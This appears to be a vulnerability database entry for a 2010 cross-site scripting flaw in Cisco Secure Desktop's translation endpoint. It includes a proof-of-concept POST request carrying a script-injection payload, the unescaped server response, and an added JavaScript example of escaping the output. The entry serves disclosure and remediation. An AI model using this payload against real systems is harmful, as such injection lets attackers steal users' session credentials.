Cisco Secure Desktop translation parameter cross-site scripting vulnerability

Vulnerability ID: 1118942
Vulnerability type: Cross-site scripting
Published: 2010-01-26
Updated: 2010-01-26
CVE ID: CVE-2010-0440
CNNVD ID: CNNVD-201002-022
Platform: Hardware
CVSS score: 4.3
|Sources
https://www.exploit-db.com/exploits/33567
https://www.securityfocus.com/bid/37960
https://cxsecurity.com/issue/WLB-2010020153
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201002-022
|Details
Cisco Secure Desktop (CSD) uses encryption to reduce the risk that cookies, browser history, temporary files and downloaded content remain on the system after a remote user logs out or an SSL VPN session times out. A cross-site scripting vulnerability exists in +CSCOT+/translation of Cisco Secure Desktop. Because the eval statement in binary/mainv.js that writes into the script start.html does not adequately filter its input, a remote attacker can trigger cross-site scripting with a specially crafted POST request parameter, leading to injection of arbitrary web script and HTML.
|Exploit
source: http://www.securityfocus.com/bid/37960/info

Cisco Secure Desktop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

Versions prior to Cisco Secure Desktop 3.5 are vulnerable. 

REQUEST:
POST https://www.example.com/+CSCOT+/translation?textdomain=csd&prefix=trans&lang=en-us HTTP/1.1 
Host: www.example.com 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9) Gecko/2008052906 Firefox/3.0 (.NET CLR 3.5.30729) 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300 
Connection: keep-alive 
Referer: https://www.example.com/CACHE/sdesktop/install/start.htm 
Content-Type: application/xml; charset=UTF-8 
Cookie: webvpnLang=en-us; webvpnlogin=1
Pragma: no-cache 
Cache-Control: no-cache 
Content-Length: 56

Starting, please wait..."><script>alert(1);</script>

RESPONSE:
HTTP/1.1 200 OK 
Server: Cisco AWARE 2.0 
Content-Type: text/html; charset=UTF-8 
Cache-Control: no-cache 
Pragma: no-cache 
Connection: Keep-Alive 
Date: Mon, 16 Nov 2009 14:14:07 GMT
Content-Length: 122

trans["Starting, please wait...\"><script>alert(1);</script>"] = "Starting, please wait...\"><script>alert(1);</script>";
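As an added illustration of the fix (this is not Cisco's code, and the function names are assumptions): the translation line from the response above, emitted first as the advisory shows it and then with the reflected text escaped as a proper JavaScript string literal, so the request body can no longer break out of the script.

```javascript
// Added example, not Cisco's code: serialising a translation table the way
// the +CSCOT+/translation response above does, first as observed in the
// advisory and then hardened so reflected text stays inside the string literal.
// The only input is the constructed body from the advisory's POST request.

// Inferred from the response shown: only the double quote is backslash-escaped,
// so "<", ">" and "</script>" reach the page literally.
function unsafeTransLine(text) {
  const q = text.replace(/"/g, '\\"');
  return `trans["${q}"] = "${q}";`;
}

// Hardened: JSON.stringify yields a valid JS string literal (quotes,
// backslashes and control characters escaped); every character that the
// HTML parser or a JS line terminator would act on is then written as a
// \uXXXX escape, which leaves the decoded runtime value unchanged.
function jsStringLiteral(text) {
  return JSON.stringify(text).replace(/[<>&\u2028\u2029]/g, (c) =>
    '\\u' + c.charCodeAt(0).toString(16).padStart(4, '0'));
}

function safeTransLine(text) {
  const lit = jsStringLiteral(text);
  return `trans[${lit}] = ${lit};`;
}

// Output check for the generated script: no literal "<" or ">" may survive
// serialisation, so neither a tag nor a "</script>" terminator can appear.
// (Serving the script as application/javascript instead of text/html, as the
// response above does, is the other half of the fix.)
function containsHtmlBreakout(script) {
  return /[<>]/.test(script);
}

// Executes the hardened line as JavaScript and reads the value back, showing
// that the \u escapes are transparent to the interpreter.
function roundTrip(text) {
  const trans = {};
  new Function('trans', safeTransLine(text))(trans);
  return trans[text];
}

// Constructed sample: the body sent in the advisory's request.
const sample = 'Starting, please wait..."><script>alert(1);</script>';
console.log(unsafeTransLine(sample)); // still carries <script>...</script>
console.log(safeTransLine(sample));   // "<" and ">" appear only as \u003c / \u003e
```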
|Affected products
Cisco Secure Desktop 3.4.2048
Cisco Secure Desktop 3.1.1
Cisco Secure Desktop 3.1.1.45
Cisco Secure Desktop 3.1.1.33
Cisco Secure Desktop 3.1
|References

Source: tools.cisco.com
Link: http://tools.cisco.com/security/center/viewAlert.x?alertId=19843
Source: VUPEN
Name: ADV-2010-0273
Link: http://www.vupen.com/english/advisories/2010/0273
Source: BID
Name: 37960
Link: http://www.securityfocus.com/bid/37960
Source: BUGTRAQ
Name: 20100201 [CORE-2010-0106] Cisco Secure Desktop XSS/JavaScript Injection
Link: http://www.securityfocus.com/archive/1/archive/1/509290/100/0/threaded
Source: MISC
Link: http://www.coresecurity.com/content/cisco-secure-desktop-xss
Source: SECUNIA
Name: 38397
Link: http://secunia.com/advisories/38397
Source: NSFOCUS
Name: 14441
Link: http://www.nsfocus.net/vulndb/14441